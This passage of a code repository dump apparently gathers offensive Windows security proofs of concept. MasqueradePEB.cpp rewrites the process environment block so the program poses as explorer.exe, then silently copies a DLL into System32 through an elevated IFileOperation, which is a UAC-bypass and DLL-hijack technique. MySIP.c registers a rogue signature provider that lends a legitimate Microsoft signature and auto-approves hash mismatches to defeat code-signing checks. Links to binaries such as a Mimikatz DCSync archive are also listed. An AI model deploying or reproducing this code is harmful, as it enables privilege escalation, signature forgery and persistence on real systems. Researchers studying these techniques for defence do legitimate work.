| from->Release(); 33 | } 34 | if (SUCCEEDED(hr)) { 35 | hr = fileOperation->PerformOperations(); 36 | } 37 | } 38 | fileOperation->Release(); 39 | } 40 | CoUninitialize(); 41 | } 42 | return 0; 43 | } 44 | -------------------------------------------------------------------------------- /MasqueradePEB.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | #define RTL_MAX_DRIVE_LETTERS 32 5 | #define GDI_HANDLE_BUFFER_SIZE32 34 6 | #define GDI_HANDLE_BUFFER_SIZE64 60 7 | #define GDI_BATCH_BUFFER_SIZE 310 8 | 9 | #define NtCurrentProcess() ( (HANDLE)(LONG_PTR) -1 ) 10 | #ifndef NT_SUCCESS 11 | #define NT_SUCCESS(Status) (((NTSTATUS)(Status)) >= 0) 12 | #endif 13 | 14 | #if !defined(_M_X64) 15 | #define GDI_HANDLE_BUFFER_SIZE GDI_HANDLE_BUFFER_SIZE32 16 | #else 17 | #define GDI_HANDLE_BUFFER_SIZE GDI_HANDLE_BUFFER_SIZE64 18 | #endif 19 | 20 | typedef ULONG GDI_HANDLE_BUFFER32[GDI_HANDLE_BUFFER_SIZE32]; 21 | typedef ULONG GDI_HANDLE_BUFFER64[GDI_HANDLE_BUFFER_SIZE64]; 22 | typedef ULONG GDI_HANDLE_BUFFER[GDI_HANDLE_BUFFER_SIZE]; 23 | 24 | typedef struct _UNICODE_STRING { 25 | USHORT Length; 26 | USHORT MaximumLength; 27 | PWSTR Buffer; 28 | } UNICODE_STRING; 29 | typedef UNICODE_STRING *PUNICODE_STRING; 30 | 31 | 32 | typedef struct _STRING { 33 | USHORT Length; 34 | USHORT MaximumLength; 35 | PCHAR Buffer; 36 | } STRING; 37 | typedef STRING *PSTRING; 38 | 39 | typedef struct _CLIENT_ID { 40 | HANDLE UniqueProcess; 41 | HANDLE UniqueThread; 42 | } CLIENT_ID, *PCLIENT_ID; 43 | 44 | typedef struct _CLIENT_ID64 { 45 | ULONG64 UniqueProcess; 46 | ULONG64 UniqueThread; 47 | } CLIENT_ID64, *PCLIENT_ID64; 48 | 49 | typedef struct _LDR_DATA_TABLE_ENTRY_COMPATIBLE { 50 | LIST_ENTRY InLoadOrderLinks; 51 | LIST_ENTRY InMemoryOrderLinks; 52 | union 53 | { 54 | LIST_ENTRY InInitializationOrderLinks; 55 | LIST_ENTRY InProgressLinks; 56 | } DUMMYUNION0; 57 | PVOID DllBase; 58 | PVOID EntryPoint; 59 | ULONG SizeOfImage; 
60 | UNICODE_STRING FullDllName; 61 | UNICODE_STRING BaseDllName; 62 | union 63 | { 64 | ULONG Flags; 65 | struct 66 | { 67 | ULONG PackagedBinary : 1; // Size=4 Offset=104 BitOffset=0 BitCount=1 68 | ULONG MarkedForRemoval : 1; // Size=4 Offset=104 BitOffset=1 BitCount=1 69 | ULONG ImageDll : 1; // Size=4 Offset=104 BitOffset=2 BitCount=1 70 | ULONG LoadNotificationsSent : 1; // Size=4 Offset=104 BitOffset=3 BitCount=1 71 | ULONG TelemetryEntryProcessed : 1; // Size=4 Offset=104 BitOffset=4 BitCount=1 72 | ULONG ProcessStaticImport : 1; // Size=4 Offset=104 BitOffset=5 BitCount=1 73 | ULONG InLegacyLists : 1; // Size=4 Offset=104 BitOffset=6 BitCount=1 74 | ULONG InIndexes : 1; // Size=4 Offset=104 BitOffset=7 BitCount=1 75 | ULONG ShimDll : 1; // Size=4 Offset=104 BitOffset=8 BitCount=1 76 | ULONG InExceptionTable : 1; // Size=4 Offset=104 BitOffset=9 BitCount=1 77 | ULONG ReservedFlags1 : 2; // Size=4 Offset=104 BitOffset=10 BitCount=2 78 | ULONG LoadInProgress : 1; // Size=4 Offset=104 BitOffset=12 BitCount=1 79 | ULONG LoadConfigProcessed : 1; // Size=4 Offset=104 BitOffset=13 BitCount=1 80 | ULONG EntryProcessed : 1; // Size=4 Offset=104 BitOffset=14 BitCount=1 81 | ULONG ProtectDelayLoad : 1; // Size=4 Offset=104 BitOffset=15 BitCount=1 82 | ULONG ReservedFlags3 : 2; // Size=4 Offset=104 BitOffset=16 BitCount=2 83 | ULONG DontCallForThreads : 1; // Size=4 Offset=104 BitOffset=18 BitCount=1 84 | ULONG ProcessAttachCalled : 1; // Size=4 Offset=104 BitOffset=19 BitCount=1 85 | ULONG ProcessAttachFailed : 1; // Size=4 Offset=104 BitOffset=20 BitCount=1 86 | ULONG CorDeferredValidate : 1; // Size=4 Offset=104 BitOffset=21 BitCount=1 87 | ULONG CorImage : 1; // Size=4 Offset=104 BitOffset=22 BitCount=1 88 | ULONG DontRelocate : 1; // Size=4 Offset=104 BitOffset=23 BitCount=1 89 | ULONG CorILOnly : 1; // Size=4 Offset=104 BitOffset=24 BitCount=1 90 | ULONG ChpeImage : 1; // Size=4 Offset=104 BitOffset=25 BitCount=1 91 | ULONG ReservedFlags5 : 2; // Size=4 
Offset=104 BitOffset=26 BitCount=2 92 | ULONG Redirected : 1; // Size=4 Offset=104 BitOffset=28 BitCount=1 93 | ULONG ReservedFlags6 : 2; // Size=4 Offset=104 BitOffset=29 BitCount=2 94 | ULONG CompatDatabaseProcessed : 1; // Size=4 Offset=104 BitOffset=31 BitCount=1 95 | }; 96 | } ENTRYFLAGSUNION; 97 | WORD ObsoleteLoadCount; 98 | WORD TlsIndex; 99 | union 100 | { 101 | LIST_ENTRY HashLinks; 102 | struct 103 | { 104 | PVOID SectionPointer; 105 | ULONG CheckSum; 106 | }; 107 | } DUMMYUNION1; 108 | union 109 | { 110 | ULONG TimeDateStamp; 111 | PVOID LoadedImports; 112 | } DUMMYUNION2; 113 | //fields below removed for compatibility 114 | } LDR_DATA_TABLE_ENTRY_COMPATIBLE, *PLDR_DATA_TABLE_ENTRY_COMPATIBLE; 115 | typedef LDR_DATA_TABLE_ENTRY_COMPATIBLE LDR_DATA_TABLE_ENTRY; 116 | 117 | typedef LDR_DATA_TABLE_ENTRY *PCLDR_DATA_TABLE_ENTRY; 118 | 119 | typedef struct _PEB_LDR_DATA { 120 | ULONG Length; 121 | BOOLEAN Initialized; 122 | HANDLE SsHandle; 123 | LIST_ENTRY InLoadOrderModuleList; 124 | LIST_ENTRY InMemoryOrderModuleList; 125 | LIST_ENTRY InInitializationOrderModuleList; 126 | PVOID EntryInProgress; 127 | BOOLEAN ShutdownInProgress; 128 | HANDLE ShutdownThreadId; 129 | } PEB_LDR_DATA, *PPEB_LDR_DATA; 130 | 131 | 132 | typedef struct _CURDIR { 133 | UNICODE_STRING DosPath; 134 | HANDLE Handle; 135 | } CURDIR, *PCURDIR; 136 | 137 | typedef struct _RTL_DRIVE_LETTER_CURDIR { 138 | USHORT Flags; 139 | USHORT Length; 140 | ULONG TimeStamp; 141 | STRING DosPath; 142 | } RTL_DRIVE_LETTER_CURDIR, *PRTL_DRIVE_LETTER_CURDIR; 143 | 144 | 145 | typedef struct _RTL_USER_PROCESS_PARAMETERS { 146 | ULONG MaximumLength; 147 | ULONG Length; 148 | 149 | ULONG Flags; 150 | ULONG DebugFlags; 151 | 152 | HANDLE ConsoleHandle; 153 | ULONG ConsoleFlags; 154 | HANDLE StandardInput; 155 | HANDLE StandardOutput; 156 | HANDLE StandardError; 157 | 158 | CURDIR CurrentDirectory; 159 | UNICODE_STRING DllPath; 160 | UNICODE_STRING ImagePathName; 161 | UNICODE_STRING CommandLine; 162 | PVOID 
Environment; 163 | 164 | ULONG StartingX; 165 | ULONG StartingY; 166 | ULONG CountX; 167 | ULONG CountY; 168 | ULONG CountCharsX; 169 | ULONG CountCharsY; 170 | ULONG FillAttribute; 171 | 172 | ULONG WindowFlags; 173 | ULONG ShowWindowFlags; 174 | UNICODE_STRING WindowTitle; 175 | UNICODE_STRING DesktopInfo; 176 | UNICODE_STRING ShellInfo; 177 | UNICODE_STRING RuntimeData; 178 | RTL_DRIVE_LETTER_CURDIR CurrentDirectories[RTL_MAX_DRIVE_LETTERS]; 179 | 180 | ULONG EnvironmentSize; 181 | ULONG EnvironmentVersion; 182 | PVOID PackageDependencyData; //8+ 183 | ULONG ProcessGroupId; 184 | // ULONG LoaderThreads; 185 | } RTL_USER_PROCESS_PARAMETERS, *PRTL_USER_PROCESS_PARAMETERS; 186 | 187 | typedef struct _PEB { 188 | BOOLEAN InheritedAddressSpace; 189 | BOOLEAN ReadImageFileExecOptions; 190 | BOOLEAN BeingDebugged; 191 | union 192 | { 193 | BOOLEAN BitField; 194 | struct 195 | { 196 | BOOLEAN ImageUsesLargePages : 1; 197 | BOOLEAN IsProtectedProcess : 1; 198 | BOOLEAN IsImageDynamicallyRelocated : 1; 199 | BOOLEAN SkipPatchingUser32Forwarders : 1; 200 | BOOLEAN IsPackagedProcess : 1; 201 | BOOLEAN IsAppContainer : 1; 202 | BOOLEAN IsProtectedProcessLight : 1; 203 | BOOLEAN IsLongPathAwareProcess : 1; 204 | }; 205 | }; 206 | HANDLE Mutant; 207 | 208 | PVOID ImageBaseAddress; 209 | PPEB_LDR_DATA Ldr; 210 | PRTL_USER_PROCESS_PARAMETERS ProcessParameters; 211 | PVOID SubSystemData; 212 | PVOID ProcessHeap; 213 | PRTL_CRITICAL_SECTION FastPebLock; 214 | PVOID AtlThunkSListPtr; 215 | PVOID IFEOKey; 216 | union 217 | { 218 | ULONG CrossProcessFlags; 219 | struct 220 | { 221 | ULONG ProcessInJob : 1; 222 | ULONG ProcessInitializing : 1; 223 | ULONG ProcessUsingVEH : 1; 224 | ULONG ProcessUsingVCH : 1; 225 | ULONG ProcessUsingFTH : 1; 226 | ULONG ProcessPreviouslyThrottled : 1; 227 | ULONG ProcessCurrentlyThrottled : 1; 228 | ULONG ReservedBits0 : 25; 229 | }; 230 | ULONG EnvironmentUpdateCount; 231 | }; 232 | union 233 | { 234 | PVOID KernelCallbackTable; 235 | PVOID 
UserSharedInfoPtr; 236 | }; 237 | ULONG SystemReserved[1]; 238 | ULONG AtlThunkSListPtr32; 239 | PVOID ApiSetMap; 240 | ULONG TlsExpansionCounter; 241 | PVOID TlsBitmap; 242 | ULONG TlsBitmapBits[2]; 243 | PVOID ReadOnlySharedMemoryBase; 244 | PVOID HotpatchInformation; 245 | PVOID *ReadOnlyStaticServerData; 246 | PVOID AnsiCodePageData; 247 | PVOID OemCodePageData; 248 | PVOID UnicodeCaseTableData; 249 | 250 | ULONG NumberOfProcessors; 251 | ULONG NtGlobalFlag; 252 | 253 | LARGE_INTEGER CriticalSectionTimeout; 254 | SIZE_T HeapSegmentReserve; 255 | SIZE_T HeapSegmentCommit; 256 | SIZE_T HeapDeCommitTotalFreeThreshold; 257 | SIZE_T HeapDeCommitFreeBlockThreshold; 258 | 259 | ULONG NumberOfHeaps; 260 | ULONG MaximumNumberOfHeaps; 261 | PVOID *ProcessHeaps; 262 | 263 | PVOID GdiSharedHandleTable; 264 | PVOID ProcessStarterHelper; 265 | ULONG GdiDCAttributeList; 266 | 267 | PRTL_CRITICAL_SECTION LoaderLock; 268 | 269 | ULONG OSMajorVersion; 270 | ULONG OSMinorVersion; 271 | USHORT OSBuildNumber; 272 | USHORT OSCSDVersion; 273 | ULONG OSPlatformId; 274 | ULONG ImageSubsystem; 275 | ULONG ImageSubsystemMajorVersion; 276 | ULONG ImageSubsystemMinorVersion; 277 | ULONG_PTR ImageProcessAffinityMask; 278 | GDI_HANDLE_BUFFER GdiHandleBuffer; 279 | PVOID PostProcessInitRoutine; 280 | 281 | PVOID TlsExpansionBitmap; 282 | ULONG TlsExpansionBitmapBits[32]; 283 | 284 | ULONG SessionId; 285 | 286 | ULARGE_INTEGER AppCompatFlags; 287 | ULARGE_INTEGER AppCompatFlagsUser; 288 | PVOID pShimData; 289 | PVOID AppCompatInfo; 290 | 291 | UNICODE_STRING CSDVersion; 292 | 293 | PVOID ActivationContextData; 294 | PVOID ProcessAssemblyStorageMap; 295 | PVOID SystemDefaultActivationContextData; 296 | PVOID SystemAssemblyStorageMap; 297 | 298 | SIZE_T MinimumStackCommit; 299 | 300 | PVOID *FlsCallback; 301 | LIST_ENTRY FlsListHead; 302 | PVOID FlsBitmap; 303 | ULONG FlsBitmapBits[FLS_MAXIMUM_AVAILABLE / (sizeof(ULONG) * 8)]; 304 | ULONG FlsHighIndex; 305 | 306 | PVOID WerRegistrationData; 307 
| PVOID WerShipAssertPtr; 308 | PVOID pContextData; 309 | PVOID pImageHeaderHash; 310 | union 311 | { 312 | ULONG TracingFlags; 313 | struct 314 | { 315 | ULONG HeapTracingEnabled : 1; 316 | ULONG CritSecTracingEnabled : 1; 317 | ULONG LibLoaderTracingEnabled : 1; 318 | ULONG SpareTracingBits : 29; 319 | }; 320 | }; 321 | ULONGLONG CsrServerReadOnlySharedMemoryBase; 322 | } PEB, *PPEB; 323 | 324 | typedef struct _GDI_TEB_BATCH { 325 | ULONG Offset; 326 | UCHAR Alignment[4]; 327 | ULONG_PTR HDC; 328 | ULONG Buffer[GDI_BATCH_BUFFER_SIZE]; 329 | } GDI_TEB_BATCH, *PGDI_TEB_BATCH; 330 | 331 | typedef struct _TEB_ACTIVE_FRAME_CONTEXT { 332 | ULONG Flags; 333 | PSTR FrameName; 334 | } TEB_ACTIVE_FRAME_CONTEXT, *PTEB_ACTIVE_FRAME_CONTEXT; 335 | 336 | typedef struct _TEB_ACTIVE_FRAME { 337 | ULONG Flags; 338 | struct _TEB_ACTIVE_FRAME *Previous; 339 | PTEB_ACTIVE_FRAME_CONTEXT Context; 340 | } TEB_ACTIVE_FRAME, *PTEB_ACTIVE_FRAME; 341 | 342 | typedef struct _TEB { 343 | NT_TIB NtTib; 344 | 345 | PVOID EnvironmentPointer; 346 | CLIENT_ID ClientId; 347 | PVOID ActiveRpcHandle; 348 | PVOID ThreadLocalStoragePointer; 349 | PPEB ProcessEnvironmentBlock; 350 | 351 | ULONG LastErrorValue; 352 | ULONG CountOfOwnedCriticalSections; 353 | PVOID CsrClientThread; 354 | PVOID Win32ThreadInfo; 355 | ULONG User32Reserved[26]; 356 | ULONG UserReserved[5]; 357 | PVOID WOW32Reserved; 358 | LCID CurrentLocale; 359 | ULONG FpSoftwareStatusRegister; 360 | PVOID SystemReserved1[54]; 361 | NTSTATUS ExceptionCode; 362 | PVOID ActivationContextStackPointer; 363 | #if defined(_M_X64) 364 | UCHAR SpareBytes[24]; 365 | #else 366 | UCHAR SpareBytes[36]; 367 | #endif 368 | ULONG TxFsContext; 369 | 370 | GDI_TEB_BATCH GdiTebBatch; 371 | CLIENT_ID RealClientId; 372 | HANDLE GdiCachedProcessHandle; 373 | ULONG GdiClientPID; 374 | ULONG GdiClientTID; 375 | PVOID GdiThreadLocalInfo; 376 | ULONG_PTR Win32ClientInfo[62]; 377 | PVOID glDispatchTable[233]; 378 | ULONG_PTR glReserved1[29]; 379 | PVOID 
glReserved2; 380 | PVOID glSectionInfo; 381 | PVOID glSection; 382 | PVOID glTable; 383 | PVOID glCurrentRC; 384 | PVOID glContext; 385 | 386 | NTSTATUS LastStatusValue; 387 | UNICODE_STRING StaticUnicodeString; 388 | WCHAR StaticUnicodeBuffer[261]; 389 | 390 | PVOID DeallocationStack; 391 | PVOID TlsSlots[64]; 392 | LIST_ENTRY TlsLinks; 393 | 394 | PVOID Vdm; 395 | PVOID ReservedForNtRpc; 396 | PVOID DbgSsReserved[2]; 397 | 398 | ULONG HardErrorMode; 399 | #if defined(_M_X64) 400 | PVOID Instrumentation[11]; 401 | #else 402 | PVOID Instrumentation[9]; 403 | #endif 404 | GUID ActivityId; 405 | 406 | PVOID SubProcessTag; 407 | PVOID EtwLocalData; 408 | PVOID EtwTraceData; 409 | PVOID WinSockData; 410 | ULONG GdiBatchCount; 411 | 412 | union 413 | { 414 | PROCESSOR_NUMBER CurrentIdealProcessor; 415 | ULONG IdealProcessorValue; 416 | struct 417 | { 418 | UCHAR ReservedPad0; 419 | UCHAR ReservedPad1; 420 | UCHAR ReservedPad2; 421 | UCHAR IdealProcessor; 422 | }; 423 | }; 424 | 425 | ULONG GuaranteedStackBytes; 426 | PVOID ReservedForPerf; 427 | PVOID ReservedForOle; 428 | ULONG WaitingOnLoaderLock; 429 | PVOID SavedPriorityState; 430 | ULONG_PTR SoftPatchPtr1; 431 | PVOID ThreadPoolData; 432 | PVOID *TlsExpansionSlots; 433 | #if defined(_M_X64) 434 | PVOID DeallocationBStore; 435 | PVOID BStoreLimit; 436 | #endif 437 | ULONG MuiGeneration; 438 | ULONG IsImpersonating; 439 | PVOID NlsCache; 440 | PVOID pShimData; 441 | ULONG HeapVirtualAffinity; 442 | HANDLE CurrentTransactionHandle; 443 | PTEB_ACTIVE_FRAME ActiveFrame; 444 | PVOID FlsData; 445 | 446 | PVOID PreferredLanguages; 447 | PVOID UserPrefLanguages; 448 | PVOID MergedPrefLanguages; 449 | ULONG MuiImpersonation; 450 | 451 | union 452 | { 453 | USHORT CrossTebFlags; 454 | USHORT SpareCrossTebBits : 16; 455 | }; 456 | union 457 | { 458 | USHORT SameTebFlags; 459 | struct 460 | { 461 | USHORT SafeThunkCall : 1; 462 | USHORT InDebugPrint : 1; 463 | USHORT HasFiberData : 1; 464 | USHORT SkipThreadAttach : 1; 465 | 
USHORT WerInShipAssertCode : 1; 466 | USHORT RanProcessInit : 1; 467 | USHORT ClonedThread : 1; 468 | USHORT SuppressDebugMsg : 1; 469 | USHORT DisableUserStackWalk : 1; 470 | USHORT RtlExceptionAttached : 1; 471 | USHORT InitialThread : 1; 472 | USHORT SpareSameTebBits : 1; 473 | }; 474 | }; 475 | 476 | PVOID TxnScopeEnterCallback; 477 | PVOID TxnScopeExitCallback; 478 | PVOID TxnScopeContext; 479 | ULONG LockCount; 480 | ULONG SpareUlong0; 481 | PVOID ResourceRetValue; 482 | } TEB, *PTEB; 483 | 484 | typedef VOID(NTAPI *PLDR_LOADED_MODULE_ENUMERATION_CALLBACK_FUNCTION)( 485 | _In_ PCLDR_DATA_TABLE_ENTRY DataTableEntry, 486 | _In_ PVOID Context, 487 | _Inout_ BOOLEAN *StopEnumeration 488 | ); 489 | 490 | typedef PVOID NTAPI RTLINITUNICODESTRING( 491 | _Inout_ PUNICODE_STRING DestinationString, 492 | _In_opt_ PCWSTR SourceString 493 | ); 494 | typedef RTLINITUNICODESTRING FAR * LPRTLINITUNICODESTRING; 495 | LPRTLINITUNICODESTRING RtlInitUnicodeString; 496 | 497 | typedef NTSTATUS NTAPI RTLENTERCRITICALSECTION( 498 | _In_ PRTL_CRITICAL_SECTION CriticalSection 499 | ); 500 | typedef RTLENTERCRITICALSECTION FAR * LPRTLENTERCRITICALSECTION; 501 | LPRTLENTERCRITICALSECTION RtlEnterCriticalSection; 502 | 503 | typedef NTSTATUS NTAPI RTLLEAVECRITICALSECTION( 504 | _In_ PRTL_CRITICAL_SECTION CriticalSection 505 | ); 506 | typedef RTLLEAVECRITICALSECTION FAR * LPRTLLEAVECRITICALSECTION; 507 | LPRTLLEAVECRITICALSECTION RtlLeaveCriticalSection; 508 | 509 | typedef NTSTATUS NTAPI LDRENUMERATELOADEDMODULES( 510 | _In_opt_ ULONG Flags, 511 | _In_ PLDR_LOADED_MODULE_ENUMERATION_CALLBACK_FUNCTION CallbackFunction, 512 | _In_opt_ PVOID Context); 513 | typedef LDRENUMERATELOADEDMODULES FAR * LPLDRENUMERATELOADEDMODULES; 514 | LPLDRENUMERATELOADEDMODULES LdrEnumerateLoadedModules; 515 | 516 | typedef NTSTATUS NTAPI NTALLOCATEVIRTUALMEMORY( 517 | _In_ HANDLE ProcessHandle, 518 | _Inout_ PVOID *BaseAddress, 519 | _In_ ULONG_PTR ZeroBits, 520 | _Inout_ PSIZE_T RegionSize, 521 | _In_ 
ULONG AllocationType, 522 | _In_ ULONG Protect 523 | ); 524 | typedef NTALLOCATEVIRTUALMEMORY FAR * LPNTALLOCATEVIRTUALMEMORY; 525 | LPNTALLOCATEVIRTUALMEMORY NtAllocateVirtualMemory; 526 | 527 | LPWSTR g_lpszExplorer2 = TEXT("C:\\windows\\explorer.exe"); 528 | 529 | VOID NTAPI supxLdrEnumModulesCallback( 530 | _In_ PCLDR_DATA_TABLE_ENTRY DataTableEntry, 531 | _In_ PVOID Context, 532 | _Inout_ BOOLEAN *StopEnumeration 533 | ) 534 | { 535 | PPEB Peb = (PPEB)Context; 536 | 537 | if (DataTableEntry->DllBase == Peb->ImageBaseAddress) { 538 | RtlInitUnicodeString(&DataTableEntry->FullDllName, g_lpszExplorer2); 539 | RtlInitUnicodeString(&DataTableEntry->BaseDllName, L"explorer.exe"); 540 | *StopEnumeration = TRUE; 541 | } 542 | else { 543 | *StopEnumeration = FALSE; 544 | } 545 | } 546 | 547 | __inline struct _PEB * NtCurrentPeb() { return NtCurrentTeb()->ProcessEnvironmentBlock; } 548 | 549 | VOID supMasqueradeProcess( 550 | VOID 551 | ) 552 | { 553 | NTSTATUS Status; 554 | PPEB Peb = NtCurrentPeb(); 555 | SIZE_T RegionSize; 556 | 557 | PVOID g_lpszExplorer = NULL; 558 | RegionSize = 0x1000; 559 | 560 | Status = NtAllocateVirtualMemory( 561 | NtCurrentProcess(), 562 | &g_lpszExplorer, 563 | 0, 564 | &RegionSize, 565 | MEM_COMMIT | MEM_RESERVE, 566 | PAGE_READWRITE); 567 | 568 | if (NT_SUCCESS(Status)) { 569 | RtlEnterCriticalSection(Peb->FastPebLock); 570 | 571 | RtlInitUnicodeString(&Peb->ProcessParameters->ImagePathName, g_lpszExplorer2); 572 | RtlInitUnicodeString(&Peb->ProcessParameters->CommandLine, g_lpszExplorer2); 573 | 574 | RtlLeaveCriticalSection(Peb->FastPebLock); 575 | 576 | LdrEnumerateLoadedModules(0, &supxLdrEnumModulesCallback, (PVOID)Peb); 577 | } 578 | } 579 | 580 | int _tmain(int argc, _TCHAR* argv[]) 581 | { 582 | HINSTANCE hinstStub = GetModuleHandle(_T("ntdll.dll")); 583 | if(hinstStub) 584 | { 585 | RtlInitUnicodeString = (LPRTLINITUNICODESTRING)GetProcAddress(hinstStub, "RtlInitUnicodeString"); 586 | if (!RtlInitUnicodeString) 587 | { 588 | 
printf("Could not find RtlInitUnicodeString entry point in NTDLL.DLL"); 589 | exit(0); 590 | } 591 | 592 | RtlEnterCriticalSection = (LPRTLENTERCRITICALSECTION)GetProcAddress(hinstStub, "RtlEnterCriticalSection"); 593 | if (!RtlEnterCriticalSection) 594 | { 595 | printf("Could not find RtlEnterCriticalSection entry point in NTDLL.DLL"); 596 | exit(0); 597 | } 598 | 599 | RtlLeaveCriticalSection = (LPRTLLEAVECRITICALSECTION)GetProcAddress(hinstStub, "RtlLeaveCriticalSection"); 600 | if (!RtlLeaveCriticalSection) 601 | { 602 | printf("Could not find RtlLeaveCriticalSection entry point in NTDLL.DLL"); 603 | exit(0); 604 | } 605 | 606 | LdrEnumerateLoadedModules = (LPLDRENUMERATELOADEDMODULES)GetProcAddress(hinstStub, "LdrEnumerateLoadedModules"); 607 | if (!LdrEnumerateLoadedModules) 608 | { 609 | printf("Could not find LdrEnumerateLoadedModules entry point in NTDLL.DLL"); 610 | exit(0); 611 | } 612 | 613 | NtAllocateVirtualMemory = (LPNTALLOCATEVIRTUALMEMORY)GetProcAddress(hinstStub, "NtAllocateVirtualMemory"); 614 | if (!NtAllocateVirtualMemory) 615 | { 616 | printf("Could not find NtAllocateVirtualMemory entry point in NTDLL.DLL"); 617 | exit(0); 618 | } 619 | } 620 | else 621 | { 622 | printf("Could not GetModuleHandle of NTDLL.DLL"); 623 | exit(0); 624 | } 625 | 626 | supMasqueradeProcess(); 627 | 628 | HMODULE hModule = NULL; 629 | IFileOperation *fileOperation = NULL; 630 | LPCWSTR dllName = L"ntwdblib.dll"; 631 | LPCWSTR SourceFullPath = L"C:\\6\\ntwdblib.dll"; 632 | LPCWSTR DestPath = L"C:\\windows\\System32"; 633 | HRESULT hr = CoInitializeEx(NULL, COINIT_APARTMENTTHREADED | COINIT_DISABLE_OLE1DDE); 634 | if (SUCCEEDED(hr)) { 635 | hr = CoCreateInstance(CLSID_FileOperation, NULL, CLSCTX_ALL, IID_PPV_ARGS(&fileOperation)); 636 | if (SUCCEEDED(hr)) { 637 | hr = fileOperation->SetOperationFlags( 638 | FOF_NOCONFIRMATION | 639 | FOF_SILENT | 640 | FOFX_SHOWELEVATIONPROMPT | 641 | FOFX_NOCOPYHOOKS | 642 | FOFX_REQUIREELEVATION | 643 | FOF_NOERRORUI); 644 | if 
(SUCCEEDED(hr)) { 645 | IShellItem *from = NULL, *to = NULL; 646 | hr = SHCreateItemFromParsingName(SourceFullPath, NULL, IID_PPV_ARGS(&from)); 647 | if (SUCCEEDED(hr)) { 648 | if (DestPath) 649 | hr = SHCreateItemFromParsingName(DestPath, NULL, IID_PPV_ARGS(&to)); 650 | if (SUCCEEDED(hr)) { 651 | hr = fileOperation->CopyItem(from, to, dllName, NULL); 652 | if (NULL != to) 653 | to->Release(); 654 | } 655 | from->Release(); 656 | } 657 | if (SUCCEEDED(hr)) { 658 | hr = fileOperation->PerformOperations(); 659 | } 660 | } 661 | fileOperation->Release(); 662 | } 663 | CoUninitialize(); 664 | } 665 | 666 | // MessageBoxA(0, "Hello World", "Hello World", 0); 667 | return 0; 668 | } 669 | 670 | -------------------------------------------------------------------------------- /MicTray.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/3gstudent/test/15218f57c171ee7c6369bdb670e4b19222ef23a4/MicTray.exe -------------------------------------------------------------------------------- /MicTray64.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/3gstudent/test/15218f57c171ee7c6369bdb670e4b19222ef23a4/MicTray64.exe -------------------------------------------------------------------------------- /Microsoft.ActiveDirectory.Management.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/3gstudent/test/15218f57c171ee7c6369bdb670e4b19222ef23a4/Microsoft.ActiveDirectory.Management.dll -------------------------------------------------------------------------------- /Microsoft.Exchange.Data(dll of Exchange2010).zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/3gstudent/test/15218f57c171ee7c6369bdb670e4b19222ef23a4/Microsoft.Exchange.Data(dll of Exchange2010).zip 
-------------------------------------------------------------------------------- /Mimkatz-dcsync.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/3gstudent/test/15218f57c171ee7c6369bdb670e4b19222ef23a4/Mimkatz-dcsync.zip -------------------------------------------------------------------------------- /MySIP.c: -------------------------------------------------------------------------------- 1 | #include "MySIP.h" 2 | 3 | HMODULE DllModuleAddress; 4 | GUID MySIPGUID = CRYPT_SUBJTYPE_MY_IMAGE; 5 | 6 | BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved) 7 | { 8 | UNREFERENCED_PARAMETER(fdwReason); 9 | UNREFERENCED_PARAMETER(lpvReserved); 10 | 11 | DllModuleAddress = (HMODULE) hinstDLL; 12 | 13 | return TRUE; 14 | } 15 | 16 | STDAPI DllRegisterServer(void) 17 | { 18 | HRESULT result; 19 | SIP_ADD_NEWPROVIDER NewProvider; 20 | WCHAR Filename[MAX_PATH]; 21 | 22 | result = S_OK; 23 | 24 | memset(&NewProvider, 0, sizeof(SIP_ADD_NEWPROVIDER)); 25 | 26 | if (!GetModuleFileName(DllModuleAddress, Filename, MAX_PATH)) { 27 | goto exit; 28 | } 29 | 30 | NewProvider.cbStruct = sizeof(SIP_ADD_NEWPROVIDER); 31 | NewProvider.pgSubject = &MySIPGUID, 32 | NewProvider.pwszDLLFileName = Filename, 33 | NewProvider.pwszMagicNumber = NULL; 34 | NewProvider.pwszIsFunctionName = NULL; 35 | NewProvider.pwszIsFunctionNameFmt2 = L"IsMyFileExtension"; 36 | NewProvider.pwszGetFuncName = L"GetLegitMSSignature"; 37 | NewProvider.pwszPutFuncName = L"MyPutSignature"; 38 | NewProvider.pwszCreateFuncName = L"MyCreateHash"; 39 | NewProvider.pwszVerifyFuncName = L"AutoApproveHash"; 40 | NewProvider.pwszRemoveFuncName = L"MyDelSignature"; 41 | 42 | if (!CryptSIPAddProvider(&NewProvider)) { goto exit; } 43 | 44 | goto success; 45 | 46 | exit: 47 | 48 | result = GetLastError(); 49 | 50 | if (result > 0) { result = HRESULT_FROM_WIN32(result); } 51 | 52 | success: 53 | 54 | return result; 55 | } 56 | 57 | STDAPI 
DllUnregisterServer(void) { 58 | CryptSIPRemoveProvider(&MySIPGUID); 59 | 60 | return S_OK; 61 | } 62 | 63 | // Considering this PoC SIP is only designed to retrieve a legitimate certificate 64 | // and validate it despite a hash mismatch, this function is not implemented. 65 | BOOL WINAPI MyPutSignature(SIP_SUBJECTINFO *pSubjectInfo, DWORD dwEncodingType, DWORD *pdwIndex, DWORD cbSignedDataMsg, BYTE *pbSignedDataMsg) { 66 | UNREFERENCED_PARAMETER(pSubjectInfo); 67 | UNREFERENCED_PARAMETER(dwEncodingType); 68 | UNREFERENCED_PARAMETER(pdwIndex); 69 | UNREFERENCED_PARAMETER(cbSignedDataMsg); 70 | UNREFERENCED_PARAMETER(pbSignedDataMsg); 71 | 72 | return TRUE; 73 | } 74 | 75 | // Considering this PoC SIP is only designed to retrieve a legitimate certificate 76 | // and validate it despite a hash mismatch, this function is not implemented. 77 | BOOL WINAPI MyCreateHash(SIP_SUBJECTINFO *pSubjectInfo, DWORD *pcbIndirectData, SIP_INDIRECT_DATA *pIndirectData) { 78 | UNREFERENCED_PARAMETER(pSubjectInfo); 79 | UNREFERENCED_PARAMETER(pcbIndirectData); 80 | UNREFERENCED_PARAMETER(pIndirectData); 81 | 82 | return TRUE; 83 | } 84 | 85 | // Considering this PoC SIP is only designed to retrieve a legitimate certificate 86 | // and validate it despite a hash mismatch, this function is not implemented. 
// Remove-signature callback, registered as pwszRemoveFuncName in DllRegisterServer.
// Stub: reports success without touching the file.
